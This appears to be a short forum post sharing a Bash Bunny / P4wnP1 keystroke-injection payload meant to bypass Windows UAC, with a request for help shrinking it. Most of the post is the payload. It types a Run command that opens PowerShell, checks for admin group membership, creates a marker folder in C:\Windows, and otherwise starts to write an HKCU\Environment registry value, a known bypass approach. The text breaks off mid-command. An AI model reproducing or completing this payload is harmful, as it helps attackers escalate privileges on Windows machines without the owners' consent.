In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated.
(The command at the bottom is for the P4wnP1 A.L.O.A)
Q GUI R
Q powershell
Q ENTER
Q DELAY 500
Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\";